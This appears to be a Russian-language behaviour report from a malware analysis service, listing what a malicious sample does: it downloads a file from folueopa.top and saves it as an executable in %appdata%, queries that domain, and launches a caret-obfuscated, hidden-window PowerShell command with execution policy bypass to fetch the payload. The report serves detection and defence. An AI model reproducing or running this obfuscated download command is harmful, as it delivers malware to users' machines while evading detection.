Техническая информация
- http://folueopa.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWe^r^sHell.^Exe -ExecUT^Io^NpoLiCy ^bYP^asS^ -NoPRO^fI^l^E -wi^nd^oWS^tYLE hidDE^n ^(nE^W-ob^JEct sYSTeM.n^ET.WeB^CL^iEnT).d^Ow^n^Loa^dfIl^e('http://folueopa.top/read.php?f=0....
- DNS ASK fo###opa.top
- '<SYSTEM32>\cmd.exe' /C "poWe^r^sHell.^Exe -ExecUT^Io^NpoLiCy ^bYP^asS^ -NoPRO^fI^l^E -wi^nd^oWS^tYLE hidDE^n ^(nE^W-ob^JEct sYSTeM.n^ET.WeB^CL^iEnT).d^Ow^n^Loa^dfIl^e('http://folueopa.top/read.php?f=0....' (со скрытым окном)